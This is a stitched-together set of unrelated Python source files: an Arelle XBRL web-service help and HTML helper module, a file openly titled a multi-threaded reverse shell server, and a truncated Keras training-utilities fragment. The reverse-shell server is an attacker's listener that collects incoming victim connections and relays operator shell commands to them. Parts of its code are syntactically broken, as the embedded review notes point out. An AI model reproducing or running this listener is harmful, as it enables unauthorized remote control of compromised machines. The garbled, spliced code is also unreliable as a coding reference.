    """Help web page for *get* requests to */help*.

    :returns: html - Table of CntlrWebMain web API
    """
    # One large HTML string; the middle section differs for Google App Engine
    # (no local file access, so examples use POSTed zip members) versus
    # desktop/server hosting (examples use local drive paths).
    return htmlBody(_('''<table>
<tr><th colspan="2">Arelle web API</th></tr>
<tr><td>/help</td><td>This web page.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, etc.</td></tr>
<tr><th colspan="2">Validation</th></tr>
<tr><td>/rest/xbrl/{file}/validation/xbrl</td><td>Validate document at {file}.</td></tr>
''') +
    (_('''
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>\u00A0</td><td>For an http GET request, {file} may be a web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document in the POSTed zip archived file c.xbrl and return structured xml results.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c.xbrl&media=xml</code>: Validate entry instance
document c.xbrl (in POSTed zip) and return structured xml results.</td></tr>
''')
    if cntlr.isGAE else
    _('''
<tr><td>\u00A0</td><td>For a browser request or http GET request, {file} may be local or web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c:/a/b/c.xbrl&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
''')) +
    _('''
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">flavor</td><td><code>standard</code>: XBRL 2.1 and XDT validation. (If formulas are present they will also be compiled and run.) (default)
<br/>{<code>sec</code>*|<code>edgar</code>*}: SEC Edgar Filer Manual validation. (If formulas are present they will also be compiled and run.)
<br/><code>standard-except-formula</code>: XBRL 2.1 and XDT validation. (If formulas are present they will be ignored.)
<br/><code>formula-compile-only</code>: Formulas will be compiled but not run. (No XBRL 2.1, XDT, or disclosure system validation.)
<br/><code>formula-compile-and-run</code>: Formulas will be compiled and run. (No XBRL 2.1, XDT, or disclosure system validation.)</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">labelLang</td><td>Label language to override system settings, e.g., <code>&labelLang=ja</code>.</td></tr>
<tr><td style="text-indent: 1em;">labelRole</td><td>Label role instead of standard label, e.g., <code>&labelRole=http://www.xbrl.org/2003/role/verboseLabel</code>. To use the concept QName instead of a label, specify <code>&labelRole=XBRL-concept-name</code>.</td></tr>
<tr><td style="text-indent: 1em;">uiLang</td><td>User interface language to override system settings, e.g., <code>&uiLang=fr</code>. Changes setting for current session (but not saved setting).</td></tr>
<tr><td style="text-indent: 1em;">calcDecimals</td><td>Specify calculation linkbase validation inferring decimals.</td></tr>
<tr><td style="text-indent: 1em;">calcPrecision</td><td>Specify calculation linkbase validation inferring precision.</td></tr>
<tr><td style="text-indent: 1em;">efm-*</td><td>Select Edgar Filer Manual (U.S. SEC) disclosure system validation. (Alternative to flavor parameter.):<br/>
<code>efm-pragmatic</code>: SEC-required rules, currently-allowed years<br/>
<code>efm-strict</code>: SEC-semantic additional rules, currently-allowed years<br/>
<code>efm-pragmatic-all-years</code>: SEC-required rules, all years<br/>
<code>efm-strict-all-years</code>: SEC-semantic additional rules, all years</td></tr>
<tr><td style="text-indent: 1em;">ifrs</td><td>Specify IFRS Global Filer Manual validation.</td></tr>
<tr><td style="text-indent: 1em;">hmrc</td><td>Specify HMRC validation.</td></tr>
<tr><td style="text-indent: 1em;">sbr-nl</td><td>Specify SBR-NL taxonomy validation.</td></tr>
<tr><td style="text-indent: 1em;">utr</td><td>Select validation with respect to Unit Type Registry.</td></tr>
<tr><td style="text-indent: 1em;">infoset</td><td>Select validation with respect to testcase infoset.</td></tr>
<tr><td style="text-indent: 1em;">parameters</td><td>Specify parameters for validation or formula (comma separated name=value[,name2=value2]).</td></tr>
<tr><td style="text-indent: 1em;">formulaAsserResultCounts</td><td>Report formula assertion counts.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetExprResult</td><td>Trace variable set formula value, assertion test results.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetTiming</td><td>Trace variable set execution times.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarFilterWinnowing</td><td>Trace variable set filter winnowing.</td></tr>
<tr><td style="text-indent: 1em;">{other}</td><td>Other detailed formula trace parameters:<br/>
formulaParamExprResult, formulaParamInputValue, formulaCallExprSource, formulaCallExprCode, formulaCallExprEval,
formulaCallExprResult, formulaVarSetExprEval, formulaFormulaRules, formulaVarsOrder,
formulaVarExpressionSource, formulaVarExpressionCode, formulaVarExpressionEvaluation, formulaVarExpressionResult, formulaVarFiltersResult, and formulaRunIDs.
</td></tr>
<tr><td style="text-indent: 1em;">abortOnMajorError</td><td>Abort process on major error, such as when load is unable to find an entry or discovered file.</td></tr>
<tr><td style="text-indent: 1em;">collectProfileStats</td><td>Collect profile statistics, such as timing of validation activities and formulae.</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Activate plug-ins, specify '|' separated .py modules (relative to plug-in directory).</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Activate taxonomy packages, specify '|' separated .zip packages (absolute URLs or file paths).</td></tr>
<tr><th colspan="2">Versioning Report (diff of two DTSes)</th></tr>
<tr><td>/rest/xbrl/diff</td><td>Diff two DTSes, producing an XBRL versioning report relative to report directory.</td></tr>
<tr><td></td><td>Parameters are requred "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">fromDTS</td><td>File name or url of from DTS.</td></tr>
<tr><td style="text-indent: 1em;">toDTS</td><td>File name or url of to DTS.</td></tr>
<tr><td style="text-indent: 1em;">report</td><td>File name or url of to report (to for relative path construction). The report is not written out, but its contents are returned by the web request to be saved by the requestor.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/diff?fromDTS=c:/a/prev/old.xsd&toDTS=c:/a/next/new.xsd&report=c:/a/report/report.xml</code>: Diff two DTSes and produce versioning report.</td></tr>
<tr><th colspan="2">Views</th></tr>
<tr><td>/rest/xbrl/{file}/{view}</td><td>View document at {file}.</td></tr>
<tr><td>\u00A0</td><td>{file} may be local or web url, and may have "/" characters replaced by ";" characters (but that is not necessary).</td></tr>
<tr><td>\u00A0</td><td>{view} may be <code>DTS</code>, <code>concepts</code>, <code>pre</code>, <code>cal</code>, <code>dim</code>, <code>facts</code>, <code>factTable</code>, <code>formulae</code>, <code>roleTypes</code>, or <code>arcroleTypes</code>.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/dim?media=html</code>: View dimensions of
document at c:/a/b/c.xbrl (on local drive) and return html result.</td></tr>
<tr><td>/rest/xbrl/view</td><td>(Alternative syntax) View document, file and view are provided as parameters (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/view?file=c:/a/b/c.xbrl&view=dim&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>csv</code>: CSV text results (no markup).
<br/><code>json</code>: JSON text results.</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">view</td><td>Alternate way to specify view by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">viewArcrole</td><td>Alternate way to specify view by indicating arcrole desired.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">factListCols</td><td>A list of column names for facts list. Multiple names are separated by a space or comma characters.
Example: <code>factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code></td></tr>
<tr><th colspan="2">Excel interface</th></tr>
<tr><td>GUI operation:</td><td>Select data tab.<br/>Click Get External Data From Web.<br/>
New Web Query dialog, enter rest URI to Address (example, for instance with indicated fact columns:
<code>http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code><br/>
Before clicking Go, click Options, on Options dialog select Full HTML Formatting, then Ok to Options dialog.<br/>
Click Go.<br/>
Click arrow to select table.<br/>
Click Import button.<br/>
Review insertion cell, click ok on Import Data dialog.</td></tr>
<tr><td>VBA macro:</td><td>
<code>With ActiveSheet.QueryTables.Add(Connection:= _<br/>
"URL;http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions" _<br/>
, Destination:=Range("$A$1"))<br/>
.Name = "facts"<br/>
.FieldNames = True<br/>
.RowNumbers = False<br/>
.FillAdjacentFormulas = False<br/>
.PreserveFormatting = False<br/>
.RefreshOnFileOpen = False<br/>
.BackgroundQuery = True<br/>
.RefreshStyle = xlInsertDeleteCells<br/>
.SavePassword = False<br/>
.SaveData = True<br/>
.AdjustColumnWidth = True<br/>
.RefreshPeriod = 0<br/>
.WebSelectionType = xlAllTables<br/>
.WebFormatting = xlWebFormattingAll<br/>
.WebPreFormattedTextToColumns = True<br/>
.WebConsecutiveDelimitersAsOne = True<br/>
.WebSingleBlockTextImport = False<br/>
.WebDisableDateRecognition = False<br/>
.WebDisableRedirections = False<br/>
.Refresh BackgroundQuery:=False<br/>
End With</code></td></tr>
<tr><th colspan="2">QuickBooks interface</th></tr>
<tr><td>Setup:</td><td>Install QuickBooks Web Connector by <a href="http://marketplace.intuit.com/webconnector/" target="installWBWC">clicking here</a>.<br/>
Click on QuickBooks.qwc in the Program Files Arelle directory, to install web connector for Arelle. (It specifies localhost:8080 in it.)<br/>
Open your QuickBooks and desired company<br/>
From start menu, programs, QuickBooks, start Web Connector (QBWC). Web connector may want a password, use any string, such as "abcd", as it's not checked at this time.<br/>
Start Arelle web server (if it wasn't already running)<br/>
To request xbrl-gl, select report type (generalLedger, journal, or trialBalance) and specify file name for xbrl-gl output instance.<br/>
QBWC polls once a minute, if impatient, in the QBWC window, click its Arelle checkbox and press the update button.<br/>
(If you get the error [8004041A] from Quickbooks, enable the company file for Arelle access in
Quickbooks: Edit->Preferences...->Integrated Applications->Company Preferences->click allow web access for ArelleWebService)<br/>
</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>http://localhost:8080/rest/quickbooks/generalLedger/xbrl-gl/C:/mystuff/xbrlGeneralLedger.xbrl/view?fromDate=2011-01-01&toDate=2011-12-31</code>
(You may omit <code>/view</code>.)</td></tr>
<tr><td></td><td>Parameters follow "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">fromDate, toDate</td><td>From & to dates for GL transactions</td></tr>
<tr><th colspan="2">Management</th></tr>
<tr><td>/rest/configure</td><td>Configure settings:</td></tr>
<tr><td></td><td>Parameters are required following "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">proxy</td><td>Show or modify and re-save proxy settings:<br/>
Enter 'show' to view current setting, 'system' to configure to use system proxy setting, 'none' to configure for no proxy, or 'http://[user[:password]@]host[:port]' (e.g., http://192.168.1.253, http://example.com:8080, http://joe:secret@example.com:8080)." ))
</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Show or modify and re-save plug-ins configuration:<br/>
Enter 'show' to view plug-ins configuration, , or '|' separated modules:
+url to add plug-in by its url or filename (relative to plug-in directory else absolute), ~name to reload a plug-in by its name, -name to remove a plug-in by its name,
(e.g., '+http://arelle.org/files/hello_web.py', '+C:\Program Files\Arelle\examples\plugin\hello_dolly.py' to load,
~Hello Dolly to reload, -Hello Dolly to remove). (Note that plug-ins are transient on Google App Engine, specify with &plugins to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Show or modify and re-save taxonomy packages configuration:<br/>
Enter 'show' to view packages configuration, , or '|' separated package URLs:
+url to add package by its full url or filename, ~name to reload a package by its name, -name to remove a package by its name.
(Note that packages are transient on Google App Engine, specify with &packages to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">environment</td><td>Show host environment (config and cache directories).</td></tr>
''') +
    (_('''
<tr><td>/rest/stopWebServer</td><td>Shut down (terminate process after 2.5 seconds delay).</td></tr>
''') if cntlr.isGAE else '') +  # NOTE(review): stopWebServer help shown only when isGAE -- looks inverted (GAE apps can't be stopped via os.kill); confirm against intent
    '</table>')
def about(arelleImgFile=None):
    # NOTE(review): this import precedes the string literal below, so that
    # string is NOT the function's __doc__ (harmless no-op, but misleading).
    from lxml import etree
    """About web page for *get* requests to */about*.
    :param arelleImgFile: optional url/path of the logo image; defaults to /images/arelle32.gif
    :returns: html - About web page
    """
    # %-substitutions, in order: logo image url, arelle version, word size
    # (32/64 bit), build version, python major/minor/micro, lxml major/minor/micro.
    # NOTE(review): '<tr><td>Includes:</td><tr>' below has an unclosed row
    # (second <tr> should be </tr>) — left unchanged, it is a runtime string.
    return htmlBody(_('''<table width="700p">
<tr><th colspan="2">About arelle</th></tr>
<tr><td rowspan="12" style="vertical-align:top;"><img src="%s"/></td><td>arelle® version: %s %sbit %s. An open source XBRL platform</td></tr>
<tr><td>© 2010-2015 Mark V Systems Limited.  All rights reserved.</td></tr>
<tr><td>Web site: <a href="http://www.arelle.org">http://www.arelle.org</a>.
E-mail support: <a href="mailto:support@arelle.org">support@arelle.org</a>.</td></tr>
<tr><td>Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file
except in compliance with the License.  You may obtain a copy of the License at
<a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>.
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.</td></tr>
<tr><td>Includes:</td><tr>
<tr><td style="text-indent: 2.0em;">Python® %s.%s.%s © 2001-2010 Python Software Foundation</td></tr>
<tr><td style="text-indent: 2.0em;">PyParsing © 2003-2010 Paul T. McGuire</td></tr>
<tr><td style="text-indent: 2.0em;">lxml %s.%s.%s © 2004 Infrae, ElementTree © 1999-2004 by Fredrik Lundh</td></tr>
<tr><td style="text-indent: 2.0em;">xlrd © 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, © 2001 D. Giffin, © 2000 A. Khan</td></tr>
<tr><td style="text-indent: 2.0em;">xlwt © 2007 Stephen J. Machin, Lingfo Pty Ltd, © 2005 R. V. Kiseliov</td></tr>
<tr><td style="text-indent: 2.0em;">Bottle © 2011 Marcel Hellkamp</td></tr>
</table>''') % (arelleImgFile or '/images/arelle32.gif',
                cntlr.__version__,
                cntlr.systemWordSize,
                Version.version,
                sys.version_info[0],sys.version_info[1],sys.version_info[2],
                etree.LXML_VERSION[0],etree.LXML_VERSION[1],etree.LXML_VERSION[2]) )
def indexPageREST():
    """Index (default) web page for *get* requests to */*.

    :returns: html - Web page of choices to navigate to */help* or */about*.
    """
    # Static two-row menu linking the help and about pages.
    menuHtml = _('''<table width="700p">
<tr><th colspan="2">Arelle Web Services</th></tr>
<tr><td>/help</td><td>Help web page, web services API.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, license, included software.</td></tr>
</table>''')
    return htmlBody(menuHtml)
def indexPageCGI():
    """Default web page response for *get* CGI request with no parameters.

    :returns: html - Web page of choices to navigate to *?help* or *?about*.
    """
    # Static menu of the CGI entry points.
    pageHtml = _('''<table width="700p">
<tr><th colspan="2">Arelle CGI Services</th></tr>
<tr><td>?help</td><td>Help web page, CGI services.</td></tr>
<tr><td>?about</td><td>About web page, copyrights, license, included software.</td></tr>
<tr><td>REST API</td><td>The Arelle REST API is supported through CGI if the entire CGI path is wildcard-mapped to the arelleCmdLine executable.</td></tr>
</table>''')
    return htmlBody(pageHtml)
def htmlBody(body, script=""):
    """Wraps body html string in a css-styled html web page.

    :param body: Contents for the *<body>* element
    :type body: html str
    :param script: Script to insert in generated html web page (such as a timed reload script)
    :type script: javascript str
    :returns: html - Complete xhtml page wrapping *body*.
    """
    # Fix: the 'th' rule previously used doubled braces ({{...}}), a leftover
    # from str.format()-style escaping; with %-formatting they were emitted
    # literally, producing invalid CSS.  Single braces (matching the sibling
    # rules) restore the header-shading style.
    return '''
<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
%s <head>
<STYLE type="text/css">
body, table, p {font-family:Arial,sans-serif;font-size:10pt;}
table {vertical-align:top;white-space:normal;}
th {background:#eee;}
td {vertical-align:top;}
.tableHdr{border-top:.5pt solid windowtext;border-right:none;border-bottom:none;border-left:.5pt solid windowtext;}
.cell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;}
.blockedCell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;background:#eee;}
</STYLE>
</head>
<body>
%s
</body>
</html>
''' % (script, body)
def tableRows(lines, header=None):
    """Wraps lines of text into a one-column table (for display of text results
    of operations, such as processing messages and status, to web browser).

    Replaces any *&* with *&amp;* and *<* with *&lt;* so the text renders
    literally instead of being interpreted as markup.
    (Fix: the replace chain had degenerated into no-op self-replacements —
    an HTML-entity garbling of the original escaping.)

    :param lines: Sequence (list or tuple) of line strings.
    :type lines: [str]
    :param header: Optional header text for top row of table.
    :type header: str
    :returns: html - <table> html string.
    """
    # '&' must be escaped first, so the '&lt;' produced for '<' is not re-escaped.
    return '<table cellspacing="0" cellpadding="4">%s\n</table>' % (
        ("<tr><th>%s</th></tr>" % header if header else "") +
        "\n".join("<tr><td>%s</td></tr>" % line.replace("&", "&amp;").replace("<", "&lt;")
                  for line in lines))
def errorReport(errors, media="html"):
    """Wraps lines of error text into specified media type for return of result to a request.

    :param errors: Sequence (list or tuple) of error strings.
    :type errors: [str]
    :param media: Type of result requested ("text" for plain text, anything else yields html).
    :type media: str
    :returns: str - plain-text or html rendition of the messages (also sets response content type).
    """
    if media != "text":
        # default: render the messages as a one-column html table
        response.content_type = 'text/html; charset=UTF-8'
        return htmlBody(tableRows(errors, header=_("Messages")))
    # plain-text rendition, one message per line
    response.content_type = 'text/plain; charset=UTF-8'
    return '\n'.join(errors)
def multipartResponse(parts):
    # call with ( (filename, contentType, content), ...)
    """Assemble a multipart/mixed response body from (filename, contentType,
    content) triples, setting the response content type and length."""
    boundary = '----multipart-boundary-%s----' % (uuid.uuid1(),)
    response.content_type = 'multipart/mixed; boundary=%s' % (boundary,)
    segments = []
    for filename, contentType, content in parts:
        # boundary line, then the per-part headers, blank line, then the payload
        segments.append("\r\n" + boundary + "\r\n")
        segments.append('Content-Disposition: attachment; filename="{0}";\r\n'.format(filename))
        segments.append('Content-Type: {0};\r\n'.format(contentType))
        segments.append('Content-Length: {0}\r\n'.format(len(content)))
        segments.append('\r\n')
        segments.append(content)
    # closing boundary after the final part
    segments.append("\r\n" + boundary + "\r\n")
    body = ''.join(segments)
    response.content_length = len(body)
    return body
|
server.py | # Python3 Multi-Threaded Reverse Shell - Server.py
import socket
import threading
import sys
import time
from queue import Queue
# Setup threading
NUMBER_OF_THREADS = 2
JOB_ID = [1, 2]
queue = Queue()
all_connections = []
all_addresses = []
# Create socket
def socket_create():
    """Create the module-global TCP socket `s` and set globals `host`/`port`.

    host '' binds to all interfaces; the port is hard-coded to 9999.
    """
    try:
        global host
        global port
        global s
        host = ''
        port = 9999
        s = socket.socket()
    except socket.error as msg:
        # best-effort report only; the error is not re-raised
        print("Socket Creation Error: " + str(msg))
# Bind socket to port and wait for connection
def socket_bind():
    """Bind the global socket to (host, port) and start listening.

    On a bind error, waits 3 seconds and retries recursively (unbounded
    recursion if the port stays busy).
    """
    try:
        global host
        global port
        global s
        print("Binding to Port " + str(port))
        s.bind((host, port))
        # NOTE(review): listen(5) sets the accept backlog, not a
        # "bad connection" limit as the original comment claimed.
        s.listen(5)  # Number of Bad Connections to Allow before Refusing
    except socket.error as msg:
        print("Socket Binding Error: " + str(msg) + "\nRetrying...")
        time.sleep(3)
        socket_bind()
# Accept connections for multiple clients
def accept_connections():
    """Accept inbound connections forever, tracking each socket/address pair
    in the module-global lists."""
    # Clean up old connections before starting
    for c in all_connections:
        c.close()
    del all_connections[:]
    del all_addresses[:]
    while 1:
        try:
            conn, address = s.accept()
            conn.setblocking(1)  # Do not timeout
            all_connections.append(conn)
            all_addresses.append(address)
            print("\nConnection Established: " + address[0])
        except:
            # NOTE(review): bare except silently swallows every error,
            # including KeyboardInterrupt / SystemExit.
            print("Error accepting connections")
# Interactive prompt for remote sessions
def start_shell():
    """Read operator commands ('list' / 'select N') in an endless loop."""
    while 1:
        cmd = input("remote> ")
        # NOTE(review): the next line is missing its left-hand operand and is
        # a syntax error as written — this file does not parse.
        if == "list":
            list_connections()
        elif "select" in cmd:
            conn = get_connection(cmd)
            if conn is not None:
                send_shell_commands(conn)
        else:
            print("Command Not Found...")
# Print a list of active connections
def list_connections():
    """Probe each tracked connection and print the live ones; dead
    connections are dropped from the global lists."""
    results = ''
    for i, conn in enumerate(all_connections):
        try:
            conn.send(str.encode(''))
            conn.recv(20480)
        except:  # If a connection fails, remove it
            # NOTE(review): deleting from the list while enumerating it
            # shifts later elements and skips the next entry.
            del all_connections[i]
            del all_addresses[i]
            continue
        results += str(i) + " " + str(all_addresses[i][0]) + " " + str(all_addresses[i][1]) + '\n'
    print("----- Remote Clients -----" + "\n" + results)
# Select a connection returned by list_connections()
def get_connection(cmd):
    """Parse a 'select N' command and return the Nth tracked connection,
    or None when the index (or anything else) is invalid."""
    try:
        target = cmd.replace("select ", "")
        target = int(target)
        conn = all_connections[target]  # Connect to the selected clients
        print("Now Connected: " + str(all_addresses[target][0]))
        # NOTE(review): end="" is passed to str() rather than print() here
        # (misplaced parenthesis); this raises TypeError, which the bare
        # except below converts into "Invalid Client".
        print(str(all_addresses[target][0] + "> ", end=""))
        return conn
    except:
        print("Invalid Client")
        return None
# Pass commands to the client
def send_shell_commands(conn):
    """Relay operator input to the selected connection and echo replies
    until the session is ended or the connection drops."""
    while 1:
        try:
            cmd = input()
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                client_response = str(conn.recv(20480), "utf-8")
                print(client_response, end="")
            # NOTE(review): '||' is not a Python operator and the trailing
            # colon is missing — this line is a syntax error as written.
            if cmd == "quit" || cmd == "exit"
                break
        except:
            print("Connection Lost")
            break
# Setup worker threads
def create_workers():
    """Start NUMBER_OF_THREADS daemon threads each running work()."""
    for _ in range(NUMBER_OF_THREADS):
        t = threading.Thread(target=work)
        t.daemon = True  # Kill the thread when the program exits
        t.start()
# Do the next job in the queue
def work():
    """Pull job ids off the queue: 1 = create/bind/accept loop,
    2 = interactive operator shell.  Each job loops forever, so
    task_done() is effectively never reached."""
    while 1:
        x = queue.get()
        if x == 1:
            socket_create()
            socket_bind()
            accept_connections()
        if x == 2:
            start_shell()
        queue.task_done()
# Create jobs
def create_jobs():
    """Enqueue both job ids for the worker threads."""
    for x in JOB_ID:
        queue.put(x)
    # NOTE(review): missing call parentheses — this only references the
    # bound method without invoking it, so nothing blocks here.
    queue.join
# Doooo it
create_workers()
create_jobs()
models.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import warnings
import pprint
from six.moves import range
import six
import time
import threading
try:
import queue
except ImportError:
import Queue as queue
from . import backend as K
from . import optimizers
from . import objectives
from . import callbacks as cbks
from .utils.layer_utils import container_from_config
from .utils.layer_utils import model_summary
from .utils.generic_utils import Progbar
from .layers import containers
def standardize_y(y):
    """Coerce targets to an array-like of rank >= 2.

    Anything without a `shape` attribute is converted to a numpy array,
    and 1D targets gain a trailing singleton axis.
    """
    arr = y if hasattr(y, 'shape') else np.asarray(y)
    if len(arr.shape) == 1:
        arr = np.expand_dims(arr, 1)
    return arr
def batch_shuffle(index_array, batch_size):
    """Shuffle an index array in batch-sized chunks.

    Each chunk stays contiguous (only the chunk order is permuted);
    items beyond the last full batch are stashed and re-appended,
    unshuffled, at the end.  Needed for HDF5 inputs, which require
    monotonically increasing indices within a batch.
    """
    full_batches = int(len(index_array) / batch_size)
    # stash the remainder that does not fill a whole batch
    tail = index_array[full_batches * batch_size:]
    chunks = index_array[:full_batches * batch_size].reshape((full_batches, batch_size))
    np.random.shuffle(chunks)  # permutes rows (chunks) only
    return np.append(chunks.flatten(), tail)
def make_batches(size, batch_size):
    """Return (start, end) index tuples covering range(size) in steps of
    batch_size; the final batch may be smaller."""
    nb_batch = int(np.ceil(size / float(batch_size)))
    batches = []
    for i in range(nb_batch):
        start = i * batch_size
        batches.append((start, min(size, start + batch_size)))
    return batches
def standardize_X(X):
    """Normalize model input to a list of arrays: lists pass through,
    a lone array is wrapped in a singleton list."""
    if type(X) is list:
        return X
    return [X]
def slice_X(X, start=None, stop=None):
    '''Slice an array or a list of arrays.

    Two calling conventions:
      * `start` is a list/array of indices (fancy indexing; `stop` unused);
      * `start`/`stop` are ints, giving an ordinary [start:stop] slice.
    '''
    def _take(arr):
        if hasattr(start, '__len__'):
            # hdf5 datasets only support list objects as indices,
            # so numpy index arrays are converted first
            idx = start.tolist() if hasattr(start, 'shape') else start
            return arr[idx]
        return arr[start:stop]

    if type(X) is list:
        return [_take(x) for x in X]
    return _take(X)
def weighted_objective(fn):
    """Wrap an objective `fn(y_true, y_pred)` so the returned function also
    applies an optional mask and per-sample (or per-timestep) weights,
    reducing to a scalar mean loss (backend-symbolic)."""
    def weighted(y_true, y_pred, weights, mask=None):
        '''Compute fn(y_true, y_pred), apply mask/weights, return scalar mean.
        '''
        # score_array has ndim >= 2
        score_array = fn(y_true, y_pred)
        if mask is not None:
            # Cast the mask to floatX to avoid float64 upcasting in theano
            mask = K.cast(mask, K.floatx())
            # mask should have the same shape as score_array
            score_array *= mask
            # the loss per batch should be proportional
            # to the number of unmasked samples.
            score_array /= K.mean(mask)
        # reduce score_array to same ndim as weight array
        # NOTE(review): K.ndim(weights) is evaluated even when weights is
        # None; relies on the backend tolerating that.
        ndim = K.ndim(score_array)
        weight_ndim = K.ndim(weights)
        score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
        # apply sample weighting
        if weights is not None:
            score_array *= weights
            # renormalize so zero-weighted samples do not dilute the mean
            score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
        return K.mean(score_array)
    return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
                        sample_weight_mode=None):
    '''Weight input validation and standardization to a single sample-wise
    (or timestep-wise) weight array.

    Precedence: an explicit `sample_weight` wins, then `class_weight`
    (a dict mapping class index -> weight), otherwise uniform ones.
    In "temporal" mode the result is 2D (samples, timesteps).
    '''
    # --- shape validation --------------------------------------------------
    if sample_weight_mode is not None:
        if sample_weight_mode != 'temporal':
            raise Exception('"sample_weight_mode '
                            'should be None or "temporal".')
        if len(y.shape) < 3:
            raise Exception('Timestep-wise sample weighting (use of '
                            'sample_weight_mode="temporal") is restricted to '
                            'outputs that are at least 3D, i.e. that have '
                            'a time dimension.')
        if sample_weight is not None and len(sample_weight.shape) != 2:
            raise Exception('In order to use timestep-wise sample weighting, '
                            'you should pass a 2D sample_weight array.')
    elif sample_weight is not None and len(sample_weight.shape) != 1:
        raise Exception('In order to use timestep-wise sample weights, '
                        'you should specify sample_weight_mode="temporal" '
                        'in compile(). If you just mean to use '
                        'sample-wise weights, make sure your '
                        'sample_weight array is 1D.')
    # --- explicit weights: leading dims must line up with y ----------------
    if sample_weight is not None:
        assert len(sample_weight.shape) <= len(y.shape)
        assert y.shape[:len(sample_weight.shape)] == sample_weight.shape
        return sample_weight
    # --- class weights: recover an integer class per sample from y ---------
    if isinstance(class_weight, dict):
        if len(y.shape) > 2:
            raise Exception('class_weight not supported for '
                            '3+ dimensional targets.')
        if y.shape[1] > 1:
            target_classes = y.argmax(axis=1)
        elif y.shape[1] == 1:
            target_classes = np.reshape(y, y.shape[0])
        else:
            target_classes = y
